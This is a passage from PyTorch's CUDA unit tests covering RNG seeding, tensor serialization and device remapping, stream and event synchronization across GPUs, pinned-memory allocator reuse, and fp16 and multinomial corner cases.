self.assertEqual(torch.gather(t, 1, torch.tensor([[0, 0], [1, 0]], device='cuda')),
torch.tensor([[False, False], [True, True]], device='cuda'))
def test_torch_manual_seed_seeds_cuda_devices(self):
with freeze_rng_state():
x = torch.zeros(4, 4).float().cuda()
torch.manual_seed(2)
self.assertEqual(torch.cuda.initial_seed(), 2)
x.uniform_()
torch.manual_seed(2)
y = x.clone().uniform_()
self.assertEqual(x, y)
self.assertEqual(torch.cuda.initial_seed(), 2)
def test_manual_seed(self):
with freeze_rng_state():
x = torch.zeros(4, 4).float().cuda()
torch.cuda.manual_seed(2)
self.assertEqual(torch.cuda.initial_seed(), 2)
x.uniform_()
a = torch.bernoulli(torch.full_like(x, 0.5))
torch.cuda.manual_seed(2)
y = x.clone().uniform_()
b = torch.bernoulli(torch.full_like(x, 0.5))
self.assertEqual(x, y)
self.assertEqual(a, b)
self.assertEqual(torch.cuda.initial_seed(), 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_cat_autogpu(self):
x = torch.randn(4, 4).cuda(1)
y = torch.randn(4, 4).cuda(1)
z = torch.cat([x, y], 0)
self.assertEqual(z.get_device(), x.get_device())
@unittest.skipIf(torch.cuda.device_count() >= 10, "Loading a cuda:9 tensor")
def test_load_nonexistent_device(self):
# Setup: create a serialized file object with a 'cuda:9' restore location
tensor = torch.randn(2, device='cuda')
buf = io.BytesIO()
torch.save(tensor, buf)
# NB: this might not work in the future if serialization changes
buf = io.BytesIO(buf.getvalue().replace(b'cuda:0', b'cuda:9'))
msg = r'Attempting to deserialize object on CUDA device 9'
with self.assertRaisesRegex(RuntimeError, msg):
_ = torch.load(buf)
def test_specify_improper_device_name(self):
import os
fname = "tempfile.pt"
try:
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
torch.save([torch.nn.Parameter(torch.randn(10, 10))], fname,
_use_new_zipfile_serialization=True)
torch.load(fname, 'cuda0')
finally:
if os.path.exists(fname):
os.remove(fname)
def test_get_device_index(self):
from torch.cuda._utils import _get_device_index
with self.assertRaisesRegex(RuntimeError, "Invalid device string"):
_get_device_index('cuda0', optional=True)
with self.assertRaisesRegex(ValueError, "Expected a cuda device"):
cpu_device = torch.device('cpu')
_get_device_index(cpu_device, optional=True)
def test_serialization_array_with_empty(self):
x = [torch.randn(4, 4).cuda(), torch.cuda.FloatTensor()]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), original.get_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
def gpu_remap(storage, location):
if location == 'cuda:1':
return storage.cuda(0)
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location=gpu_remap)
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_serialization_remap_dict(self):
x = [torch.randn(4, 4).cuda(0), torch.randn(4, 4).cuda(1)]
with tempfile.NamedTemporaryFile() as f:
torch.save(x, f)
f.seek(0)
x_copy = torch.load(f, map_location={'cuda:1': 'cuda:0'})
for original, copy in zip(x, x_copy):
self.assertEqual(copy, original)
self.assertIs(type(copy), type(original))
self.assertEqual(copy.get_device(), 0)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_multigpu_storage_clone(self):
x = torch.randn(4, 4, device='cuda:1').storage()
y = x.clone()
self.assertEqual(x.get_device(), y.get_device())
for t in ['byte', 'char', 'short', 'int', 'long', 'half', 'double']:
self.assertEqual(getattr(x, t)().get_device(), x.get_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_cuda_set_device(self):
x = torch.randn(5, 5)
with torch.cuda.device(1):
self.assertEqual(x.cuda().get_device(), 1)
torch.cuda.set_device(0)
self.assertEqual(x.cuda().get_device(), 0)
with torch.cuda.device(1):
self.assertEqual(x.cuda().get_device(), 1)
self.assertEqual(x.cuda().get_device(), 0)
torch.cuda.set_device(1)
self.assertEqual(x.cuda().get_device(), 0)
def test_cuda_synchronize(self):
torch.cuda.synchronize()
torch.cuda.synchronize('cuda')
torch.cuda.synchronize('cuda:0')
torch.cuda.synchronize(0)
torch.cuda.synchronize(torch.device('cuda:0'))
if TEST_MULTIGPU:
torch.cuda.synchronize('cuda:1')
torch.cuda.synchronize(1)
torch.cuda.synchronize(torch.device('cuda:1'))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize(torch.device("cpu"))
with self.assertRaisesRegex(ValueError, "Expected a cuda device, but"):
torch.cuda.synchronize("cpu")
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_current_stream(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream(device=1)
s2 = torch.cuda.current_stream(device=0)
self.assertEqual(d0, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(s0, s2)
with torch.cuda.device(d1):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream(1)
s2 = torch.cuda.current_stream(d0)
self.assertEqual(d1, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(s0, s1)
with self.assertRaisesRegex(ValueError,
"Expected a cuda device, but got: cpu"):
torch.cuda.current_stream(torch.device('cpu'))
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipCUDANonDefaultStreamIf(True)
def test_default_stream(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.default_stream()
with torch.cuda.device(d1):
s1 = torch.cuda.default_stream()
s2 = torch.cuda.default_stream(device=0)
s3 = torch.cuda.default_stream(d1)
self.assertEqual(d0, s0.device)
self.assertEqual(d1, s1.device)
self.assertEqual(d0, s2.device)
self.assertEqual(d1, s3.device)
self.assertEqual(s0, s2)
self.assertEqual(s1, s3)
with torch.cuda.device(d0):
self.assertEqual(torch.cuda.current_stream(), s0)
with torch.cuda.device(d1):
self.assertEqual(torch.cuda.current_stream(), s1)
with self.assertRaisesRegex(ValueError,
"Expected a cuda device, but got: cpu"):
torch.cuda.default_stream(torch.device('cpu'))
@skipCUDANonDefaultStreamIf(True)
def test_streams(self):
default_stream = torch.cuda.current_stream()
user_stream = torch.cuda.Stream()
self.assertEqual(torch.cuda.current_stream(), default_stream)
self.assertNotEqual(default_stream, user_stream)
self.assertEqual(default_stream.cuda_stream, 0)
self.assertNotEqual(user_stream.cuda_stream, 0)
with torch.cuda.stream(user_stream):
self.assertEqual(torch.cuda.current_stream(), user_stream)
self.assertTrue(user_stream.query())
tensor1 = torch.ByteTensor(5).pin_memory()
tensor2 = tensor1.cuda(non_blocking=True) + 1
default_stream.synchronize()
self.assertTrue(default_stream.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_device(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
e0 = torch.cuda.Event()
self.assertEqual(None, e0.device)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.Stream()
e1 = s1.record_event()
self.assertEqual(s0.device, torch.device('cuda:0'))
self.assertEqual(e0.device, torch.device('cuda:0'))
self.assertEqual(s1.device, torch.device('cuda:1'))
self.assertEqual(e1.device, torch.device('cuda:1'))
def test_stream_event_repr(self):
s = torch.cuda.current_stream()
self.assertTrue("torch.cuda.Stream" in s.__repr__())
e = torch.cuda.Event()
self.assertTrue("torch.cuda.Event" in e.__repr__())
s.record_event(e)
self.assertTrue("torch.cuda.Event" in e.__repr__())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_context(self):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.Stream(device=1)
s2 = torch.cuda.Stream(device=0)
with torch.cuda.device(s1.device):
prev_stream_on_cuda1 = torch.cuda.current_stream()
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
with torch.cuda.stream(s1):
self.assertEqual(torch.cuda.current_stream(), s1)
self.assertEqual(1, torch.cuda.current_device())
with torch.cuda.stream(s2):
self.assertEqual(torch.cuda.current_stream(), s2)
self.assertEqual(0, torch.cuda.current_device())
with torch.cuda.stream(s0):
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
self.assertEqual(torch.cuda.current_stream(), s2)
self.assertEqual(0, torch.cuda.current_device())
self.assertEqual(torch.cuda.current_stream(), s1)
self.assertEqual(1, torch.cuda.current_device())
with torch.cuda.device(s1.device):
self.assertEqual(prev_stream_on_cuda1, torch.cuda.current_stream())
self.assertEqual(torch.cuda.current_stream(), s0)
self.assertEqual(0, torch.cuda.current_device())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu(self):
default_stream = torch.cuda.current_stream()
self.assertEqual(default_stream.device, torch.device('cuda:0'))
stream = torch.cuda.Stream(device=1)
self.assertEqual(stream.device, torch.device('cuda:1'))
with torch.cuda.device(1):
self.assertEqual(
torch.cuda.current_stream().device, torch.device('cuda:1'))
self.assertNotEqual(torch.cuda.current_stream(), default_stream)
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_query(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
torch.cuda.synchronize(d0)
torch.cuda.synchronize(d1)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
self.assertTrue(s0.query())
self.assertFalse(s1.query())
with torch.cuda.device(d0):
self.assertTrue(s0.query())
self.assertFalse(s1.query())
with torch.cuda.device(d1):
self.assertTrue(s0.query())
self.assertFalse(s1.query())
# deliberately using a different device
with torch.cuda.device(d0):
s1.synchronize()
self.assertTrue(s0.query())
self.assertTrue(s1.query())
with torch.cuda.device(d0):
self.assertTrue(s0.query())
self.assertTrue(s1.query())
with torch.cuda.device(d1):
self.assertTrue(s0.query())
self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_streams_multi_gpu_eq(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.current_stream()
with torch.cuda.device(d1):
s2 = torch.cuda.current_stream()
s3 = torch.cuda.current_stream()
self.assertTrue(s0 == s0)
self.assertTrue(s0 == s1)
self.assertTrue(s2 == s2)
self.assertTrue(s2 == s3)
self.assertFalse(s0 == s2)
self.assertFalse(s1 == s3)
self.assertEqual(s0.device, s1.device)
self.assertEqual(s0.cuda_stream, s1.cuda_stream)
self.assertEqual(s2.device, s3.device)
self.assertEqual(s2.cuda_stream, s3.cuda_stream)
self.assertNotEqual(s0.device, s3.device)
self.assertEqual(hash(s0), hash(s1))
self.assertEqual(hash(s2), hash(s3))
self.assertNotEqual(hash(s0), hash(s3))
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_streams_priority(self):
low, high = torch.cuda.Stream.priority_range()
s0 = torch.cuda.Stream(device=0, priority=low)
self.assertEqual(low, s0.priority)
self.assertEqual(torch.device('cuda:0'), s0.device)
s1 = torch.cuda.Stream(device=1, priority=high)
self.assertEqual(high, s1.priority)
self.assertEqual(torch.device('cuda:1'), s1.device)
@unittest.skipIf(not TEST_MULTIGPU, "multi-GPU not supported")
def test_tensor_device(self):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=1).get_device(), 1)
with torch.cuda.device(1):
self.assertEqual(torch.cuda.FloatTensor(1).get_device(), 1)
self.assertEqual(torch.cuda.FloatTensor(1, device=0).get_device(), 0)
self.assertEqual(torch.cuda.FloatTensor(1, device=None).get_device(), 1)
def test_events(self):
stream = torch.cuda.current_stream()
event = torch.cuda.Event(enable_timing=True)
self.assertTrue(event.query())
start_event = torch.cuda.Event(enable_timing=True)
stream.record_event(start_event)
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
stream.record_event(event)
self.assertFalse(event.query())
event.synchronize()
self.assertTrue(event.query())
self.assertGreater(start_event.elapsed_time(event), 0)
@staticmethod
def _stream_synchronize(self, spin_time_cycles):
s = torch.cuda.current_stream()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
e_tik.record(s)
torch.cuda._sleep(spin_time_cycles)
e_tok.record(s)
s.synchronize()
self.assertTrue(s.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw an
# exception otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _event_synchronize(self, spin_time_cycles):
s = torch.cuda.current_stream()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
e_tik.record(s)
torch.cuda._sleep(spin_time_cycles)
s.record_event(e_tok)
e_tok.synchronize()
self.assertTrue(s.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw an
# exception otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _event_wait(self, spin_time_cycles):
s0 = torch.cuda.current_stream()
s1 = torch.cuda.Stream()
e_tik = torch.cuda.Event(blocking=True, enable_timing=True)
e_tok = torch.cuda.Event(blocking=True, enable_timing=True)
e_tik.record(s0)
torch.cuda._sleep(spin_time_cycles - 10)
e_sync = torch.cuda.Event(blocking=True)
e_sync.record()
e_sync.wait(s1)
with torch.cuda.stream(s1):
torch.cuda._sleep(10)
s1.synchronize()
e_tok.record()
e_tok.synchronize()
self.assertTrue(s0.query())
self.assertTrue(s1.query())
self.assertTrue(e_sync.query())
# not necessary to check e_tik and e_tok, as elapsed_time would throw an
# exception otherwise.
return e_tik.elapsed_time(e_tok)
@staticmethod
def _test_stream_event_nogil(self, sync_func, p2c, c2p):
with torch.cuda.device('cuda:1'):
c2p.put(0)
p2c.get()
c2p.put(sync_func(self, TestCuda.FIFTY_MIL_CYCLES))
# Skip the test for ROCm as per https://github.com/pytorch/pytorch/issues/53190
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_stream_event_nogil(self):
for sync_func in [TestCuda._stream_synchronize,
TestCuda._event_synchronize,
TestCuda._event_wait]:
p2c = queue.Queue()
c2p = queue.Queue()
e_tik = torch.cuda.Event(enable_timing=True)
e_tok = torch.cuda.Event(enable_timing=True)
t = threading.Thread(
target=TestCuda._test_stream_event_nogil,
args=(self, sync_func, p2c, c2p))
t.daemon = True
t.start()
c2p.get()
with torch.cuda.device('cuda:0'):
e_tik.record()
p2c.put(0)
parent_time = sync_func(self, TestCuda.FIFTY_MIL_CYCLES)
child_time = c2p.get()
e_tok.record()
e_tok.synchronize()
total_time = e_tik.elapsed_time(e_tok)
# Without GIL, synchronizations in parent and child threads can
# overlap. The total execution time should be a little bit longer
# than spinning fifty million cycles and much shorter than twice of
# that. However, testing absolute execution time is not reliable as
# it may vary on different hardware in different environments.
# Therefore, this test uses relative comparisons, checking if the
# sum of the parent and child threads' execution times is greater than the
# real execution time by at least 40%.
self.assertGreater(parent_time + child_time, total_time * 1.4)
# This test is flaky for ROCm, see issue #62602
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_wait(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
torch.cuda.synchronize(d0)
torch.cuda.synchronize(d1)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
e0 = torch.cuda.Event()
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
self.assertFalse(s0.query())
self.assertTrue(s1.query())
s1.wait_event(e0)
s1.synchronize()
self.assertTrue(e0.query())
self.assertTrue(s0.query())
self.assertTrue(s1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_events_multi_gpu_query(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e0 = s0.record_event()
s0.synchronize()
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
e1 = s1.record_event()
self.assertTrue(e0.query())
self.assertFalse(e1.query())
with torch.cuda.device(d0):
self.assertTrue(e0.query())
self.assertFalse(e1.query())
with torch.cuda.device(d1):
self.assertTrue(e0.query())
self.assertFalse(e1.query())
# deliberately using a different device
with torch.cuda.device(d0):
e1.synchronize()
self.assertTrue(e0.query())
self.assertTrue(e1.query())
with torch.cuda.device(d0):
self.assertTrue(e0.query())
self.assertTrue(e1.query())
with torch.cuda.device(d1):
self.assertTrue(e0.query())
self.assertTrue(e1.query())
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
@skipIfRocm
def test_events_multi_gpu_elapsed_time(self):
d0 = torch.device('cuda:0')
d1 = torch.device('cuda:1')
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e0 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(10)
s0.record_event(e0)
with torch.cuda.device(d1):
s1 = torch.cuda.current_stream()
e1 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
s1.record_event(e1)
e0.synchronize()
e1.synchronize()
with torch.cuda.device(d0):
with self.assertRaises(RuntimeError):
self.assertGreater(e0.elapsed_time(e1), 0)
with torch.cuda.device(d1):
with self.assertRaises(RuntimeError):
self.assertGreater(e0.elapsed_time(e1), 0)
with torch.cuda.device(d0):
s0 = torch.cuda.current_stream()
e2 = torch.cuda.Event(enable_timing=True)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
s0.record_event(e2)
s0.synchronize()
self.assertGreater(e0.elapsed_time(e2), 0)
# deliberately calling from a different device
with torch.cuda.device(d1):
self.assertGreater(e0.elapsed_time(e2), 0)
def test_record_stream(self):
cycles_per_ms = get_cycles_per_ms()
t = torch.FloatTensor([1, 2, 3, 4]).pin_memory()
result = torch.cuda.FloatTensor(t.size())
stream = torch.cuda.Stream()
ptr = [None]
# Performs the CPU->GPU copy in a background stream
def perform_copy():
with torch.cuda.stream(stream):
tmp = t.cuda(non_blocking=True)
ptr[0] = tmp.data_ptr()
torch.cuda.current_stream().wait_stream(stream)
tmp.record_stream(torch.cuda.current_stream())
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
result.copy_(tmp)
perform_copy()
with torch.cuda.stream(stream):
tmp2 = torch.cuda.FloatTensor(t.size())
tmp2.zero_()
self.assertNotEqual(tmp2.data_ptr(), ptr[0], msg='allocation re-used too soon')
self.assertEqual(result.tolist(), [1, 2, 3, 4])
# Check that the block will be re-used after the main stream finishes
torch.cuda.current_stream().synchronize()
with torch.cuda.stream(stream):
tmp3 = torch.cuda.FloatTensor(t.size())
self.assertEqual(tmp3.data_ptr(), ptr[0], msg='allocation not re-used')
def test_record_stream_on_shifted_view(self):
# See issue #27366
# This test detects unexpected block reallocation. For a reliable test,
# the stream used to allocate tensors is isolated. The allocator will not
# reuse free blocks which were allocated from another stream.
stream_alloc = torch.cuda.Stream()
with torch.cuda.stream(stream_alloc):
base = torch.cuda.FloatTensor([10, 10])
# Record another stream on a shifted view tensor.
view = base[5:]
assert view.storage_offset() > 0
stream_record = torch.cuda.Stream()
with torch.cuda.stream(stream_record):
torch.cuda._sleep(int(50 * get_cycles_per_ms()))
view.record_stream(stream_record)
# Delete those tensors to make the block free soon.
data_ptr = base.data_ptr()
del base, view
# A new tensor should not be allocated to the block above.
stream_alloc.synchronize()
with torch.cuda.stream(stream_alloc):
try_realloc = torch.cuda.FloatTensor([10, 10])
self.assertNotEqual(try_realloc.data_ptr(), data_ptr)
@contextlib.contextmanager
def _get_external_stream(self, device):
cudart = torch.cuda.cudart()
stream = ctypes.c_ulonglong(0)
stream_p = ctypes.POINTER(ctypes.c_void_p)(stream)
stream_p_int = ctypes.cast(stream_p, ctypes.c_void_p).value
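# `stream` acts as an out-parameter: cudaStreamCreate writes the new raw
# cudaStream_t handle through stream_p_int, and stream.value is then yielded
# to callers (e.g. to wrap in torch.cuda.ExternalStream).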
with device:
try:
out = cudart.cudaStreamCreate(stream_p_int)
self.assertEqual(out, 0)
self.assertNotEqual(stream.value, 0)
yield stream.value
finally:
out = cudart.cudaStreamDestroy(stream.value)
self.assertEqual(out, 0)
@skipIfRocm
def test_external_streams(self):
device = torch.cuda.device(0)
with self._get_external_stream(device) as stream_v:
ext_stream = torch.cuda.ExternalStream(stream_v)
self.assertEqual(stream_v, ext_stream.cuda_stream)
self.assertEqual(ext_stream.device.index, device.idx)
@skipIfRocm
@unittest.skipIf(not TEST_MULTIGPU, "detected only one GPU")
def test_external_streams_multi_device(self):
device = torch.cuda.device(1)
with self._get_external_stream(device) as stream_v:
ext_stream = torch.cuda.ExternalStream(
stream_v, device=device)
self.assertEqual(stream_v, ext_stream.cuda_stream)
self.assertEqual(ext_stream.device.index, device.idx)
def test_noncontiguous_pinned_memory(self):
# See issue #3266
x = torch.arange(0, 10).view((2, 5))
self.assertEqual(x.t(), x.t().pin_memory())
def test_caching_pinned_memory(self):
cycles_per_ms = get_cycles_per_ms()
# check that allocations are re-used after deletion
t = torch.FloatTensor([1]).pin_memory()
ptr = t.data_ptr()
del t
t = torch.FloatTensor([1]).pin_memory()
self.assertEqual(t.data_ptr(), ptr, msg='allocation not reused')
# check that the allocation is not re-used if it's in use by a copy
gpu_tensor = torch.cuda.FloatTensor([0])
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
gpu_tensor.copy_(t, non_blocking=True)
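# The non_blocking copy keeps the pinned block busy; the caching host allocator
# should therefore not reuse it for the next pin_memory() call, which the
# assertNotEqual below verifies.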
del t
t = torch.FloatTensor([1]).pin_memory()
self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
self.assertEqual(list(gpu_tensor), [1])
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_caching_pinned_memory_multi_gpu(self):
# checks that the events preventing pinned memory from being re-used
# too early are recorded on the correct GPU
cycles_per_ms = get_cycles_per_ms()
t = torch.FloatTensor([1]).pin_memory()
ptr = t.data_ptr()
gpu_tensor0 = torch.cuda.FloatTensor([0], device=0)
gpu_tensor1 = torch.cuda.FloatTensor([0], device=1)
with torch.cuda.device(1):
torch.cuda._sleep(int(50 * cycles_per_ms)) # delay the copy
gpu_tensor1.copy_(t, non_blocking=True)
del t
t = torch.FloatTensor([2]).pin_memory()
self.assertNotEqual(t.data_ptr(), ptr, msg='allocation re-used too soon')
with torch.cuda.device(0):
gpu_tensor0.copy_(t, non_blocking=True)
self.assertEqual(gpu_tensor1[0], 1)
self.assertEqual(gpu_tensor0[0], 2)
def test_caching_allocator_record_stream_oom(self):
"""allocations delayed by a record_stream call should still be freed on
an out-of-memory in cuda_malloc_retry. see issue #19219"""
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
y = torch.zeros(40 * 1024 * 1024, device='cuda')
for _ in range(100):
x = torch.empty(40 * 1024 * 1024, device='cuda')
with torch.cuda.stream(stream):
y += x
# delays re-use of `x` until after all operations in `stream`
x.record_stream(stream)
del x
# we've made a mess by allocating up to the device capacity. free any
# cached blocks in case it affects future tests.
torch.cuda.empty_cache()
# Tests for historic illegal memory access, see #17040.
def test_reduction_gpu_memory_accessing(self):
x = torch.ones(512, 8, dtype=torch.float32, device='cuda')
torch.sum(x, 0)
def test_sum_fp16(self):
x = torch.zeros(10, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(), 0)
x = torch.ones(65504, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(), 65504)
self.assertEqual(x.sum(dtype=torch.float32), 65504)
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.sum(dtype=torch.float32), 65536)
a = torch.zeros(1203611).bernoulli_(0.0005)
x = a.to(device='cuda', dtype=torch.float16)
self.assertEqual(x.sum().item(), a.sum().item())
a = torch.zeros(100, 121, 80).bernoulli_(0.0005)
x = a.to(device='cuda', dtype=torch.float16)
self.assertEqual(x.sum((0, 2)).float().cpu(), a.sum((0, 2)))
def test_mean_fp16(self):
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.mean(), 1)
x = torch.ones(65536, device='cuda', dtype=torch.float16)
self.assertEqual(x.mean(dtype=torch.float32), 1)
def test_prod_large(self):
# tests global reduction (should_global_reduce = true) in case of non-zero identity element
x = torch.ones(240000, device='cuda', dtype=torch.float32)
self.assertEqual(x.prod(), 1)
# test for complex types. Note 240k is divisible by 4
for dtype in [torch.cfloat, torch.cdouble]:
x = torch.ones(240000, device='cuda', dtype=dtype) * (0 + 1j)
self.assertEqual(x.prod(), 1)
def test_multinomial_ext(self):
# Test two corner cases from older PyTorch (Issue #4858)
freqs = torch.cuda.FloatTensor([
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.03178183361887932, 0.027680952101945877, 0.033176131546497345,
0.046052902936935425, 0.07742464542388916, 0.11543981730937958,
0.14148041605949402, 0.15784293413162231, 0.13180233538150787,
0.08271478116512299, 0.049702685326337814, 0.027557924389839172,
0.018125897273421288, 0.011851548217236996, 0.010252203792333603,
0.007422595750540495, 0.005372154992073774, 0.0045109698548913,
0.0036087757907807827, 0.0035267581697553396, 0.0018864056328311563,
0.0024605290964245796, 0.0022964938543736935, 0.0018453967059031129,
0.0010662291897460818, 0.0009842115687206388, 0.00045109697384759784,
0.0007791675161570311, 0.00020504408166743815, 0.00020504408166743815,
0.00020504408166743815, 0.00012302644609007984, 0.0,
0.00012302644609007984, 4.100881778867915e-05, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0])
torch.cuda.manual_seed(11042)
sample = torch.multinomial(freqs, 1000, True)
self.assertNotEqual(freqs[sample].min(), 0)
p = torch.zeros(3421, 2, device="cuda", dtype=torch.float)
p[:, 1] = 1
torch.cuda.manual_seed(5214)
r = torch.multinomial(p, 1)
self.assertNotEqual(r.min().item(), 0)
# test corner case from Issue #13867
torch.cuda.manual_seed(33)
probs = torch.randn(1000000, device='cuda').clamp(min=0) * 3e-5
samples = probs.multinomial(1000000, replacement=True)
self.assertGreater(probs[samples].min().item(), 0)
def _spawn_test_multinomial_invalid_probs_cuda(self, probs):
import subprocess
try:
p = subprocess.Popen([sys.executable, '-c', f"""\
import sys
import torch
from torch._six import inf, nan
try:
with torch.random.fork_rng(devices=[0]):
torch.multinomial(torch.tensor({probs}).to('cuda'), 2, replacement=True)
torch.cuda.synchronize()
sys.exit(-1) # Should not be reached
except RuntimeError as e:
sys.exit(-2)
"""], stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
out, err = p.communicate(timeout=10)
p.wait(timeout=10)
except subprocess.TimeoutExpired as e:
p.kill()
out, err = p.communicate()
expected_messages = [
'device-side assert triggered', # CUDA
'Assertion', # CUDA
'HSA_STATUS_ERROR_EXCEPTION', # ROCm
'Device-side assertion' # ROCm
]
self.assertTrue(any([msg in out or msg in err for msg in expected_messages]))
@slowTest
@unittest.skipIf(NO_MULTIPROCESSING_SPAWN, "Disabled for environments that \
don't support multiprocessing with spawn start method")
def test_multinomial_invalid_probs_cuda(self):
self._spawn_test_multinomial_invalid_probs_cuda([1., -1., 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., inf, 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., -inf, 1.])
self._spawn_test_multinomial_invalid_probs_cuda([1., 1., nan])
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_huge_index(self):
src = torch.empty(15000000, 45, device='cuda', dtype=torch.long).random_(0, 2**22)
idx = torch.randperm(src.shape[0], device='cuda')
res = src[idx]
res_cpu = src.cpu()[idx.cpu()]
self.assertEqual(res.cpu(), res_cpu)
def test_min_max_inits(self):
# Testing if THC_reduceAll received the correct index initialization.
# This affects the result of THC_reduceAll operations at extreme values
x = torch.cuda.ByteTensor([0])
y = torch.cuda.ByteTensor([255])
expected = torch.cuda.LongTensor([0])[0]
_, v = x.max(dim=0)
self.assertEqual(v, expected)
_, v = y.min(dim=0)
self.assertEqual(v, expected)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_get_set_rng_state_all(self):
states = torch.cuda.get_rng_state_all()
before0 = torch.cuda.FloatTensor(100, device=0).normal_()
before1 = torch.cuda.FloatTensor(100, device=1).normal_()
torch.cuda.set_rng_state_all(states)
after0 = torch.cuda.FloatTensor(100, device=0).normal_()
after1 = torch.cuda.FloatTensor(100, device=1).normal_()
self.assertEqual(before0, after0, atol=0, rtol=0)
self.assertEqual(before1, after1, atol=0, rtol=0)
def test_nvtx(self):
# Just making sure we can see the symbols
torch.cuda.nvtx.range_push("foo")
torch.cuda.nvtx.mark("bar")
torch.cuda.nvtx.range_pop()
range_handle = torch.cuda.nvtx.range_start("range_start")
torch.cuda.nvtx.range_end(range_handle)
def test_bincount_ext(self):
# ensure CUDA code coverage
input_size = (5000,)
w = torch.randn(input_size, dtype=torch.double, device='cuda')
w_cpu = w.cpu()
# test shared memory impl
t = torch.randint(50, input_size, dtype=torch.int8, device='cuda')
self.assertEqual(t.cpu().bincount(), t.bincount())
